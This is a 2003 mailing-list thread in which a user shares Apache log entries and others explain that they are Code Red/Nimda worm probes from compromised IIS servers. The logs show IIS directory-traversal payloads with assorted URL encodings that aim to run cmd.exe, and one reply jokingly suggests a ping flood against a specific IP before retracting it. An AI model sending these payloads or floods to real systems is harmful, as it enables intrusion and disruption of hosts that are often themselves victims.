Actually those are IIS that had been compromised with Code Red or NImda and are scaning port 80 for other IIS. You really don't have to worry about it.
El Wednesday 31 December 2003 10:57, Redeeman balbuce�: > sometimes this isnt automated, but people that type in the IP without > scan first, if you are on a heavy connection, and aint scared that your > ISP is gonna shut you down, try with ping -f 65.27.204.81 :-) > just kidding, dont do it, it probably aint the true owners of the ip > that does it, they are probably victims themselves :-) > > > On Wed, 2003-12-31 at 11:18, Aaron Walker wrote: > > A week or so ago, I setup my cable router/firewall to forward port 80 to > > one of my machines so I could run Apache. Last night while at work, I > > checked to see if it worked, and it did. So just now, I went to check > > out the access_log and noticed some funny looking stuff, that doesnt > > look like normal activity.... > > > > <snipped from /var/log/apache2/access_log> > > > > 218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET > > /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET > > /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET > > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 321 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 321 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > > > > HTTP/1.0" 404 337 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET > > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 > > "-" "-" > > 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET > > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-" > > 221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get > > /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" > > > > 501 336 "-" "-" > > > > is this someone trying to exploit apache? > > > > Thanks, > > Aaron > -- > Regards, Redeeman > () ascii ribbon campaign - against html e-mail > /\ - against microsoft attachments > > > > -- > [EMAIL PROTECTED] mailing list > > -- [EMAIL PROTECTED] mailing list
